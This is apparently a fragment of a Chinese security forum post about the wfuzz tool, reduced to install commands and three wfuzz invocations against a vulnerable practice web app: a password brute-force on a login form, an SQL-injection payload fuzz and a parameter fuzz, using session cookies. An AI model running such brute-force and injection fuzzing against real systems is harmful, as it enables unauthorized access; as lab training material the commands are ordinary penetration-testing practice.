855
862
2940
金牌会员
https://github.com/xmendez/wfuzz
http://wfuzz.readthedocs.io/
pip install wfuzz
git clone git://github.com/xmendez/wfuzz.git && python setup.py install
http://vul.xazlsec.com:8080/login.php
http://vul.xazlsec.com:8080/vulnerabilities/brute/
wfuzz -c -w pass.txt -u "http://vul.xazlsec.com:8080/vulnerabilities/brute/?username=admin&password=FUZZ&Login=Login" -b "PHPSESSID=isaaiqpa5i849bd933l9jlv3ot; security=low"
http://vul.xazlsec.com:8080/vulnerabilities/sqli/
wfuzz -z file,SQL.txt -u "http://vul.xazlsec.com:8080/vulnerabilities/sqli/?id=FUZZ&Submit=Submit" -b "PHPSESSID=isaaiqpa5i849bd933l9jlv3ot; security=low"
wfuzz -z file,parameter.txt -u "http://vul.xazlsec.com:8080/vulnerabilities/sqli/?FUZZ=1&Submit=Submit" -b "PHPSESSID=j1r5qt89fkjii8dmemc0vdh1td; security=low"
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
小黑屋|安全矩阵
GMT+8, 2024-11-29 07:34 , Processed in 0.012786 second(s), 18 queries .
Powered by Discuz! X4.0
Copyright © 2001-2020, Tencent Cloud.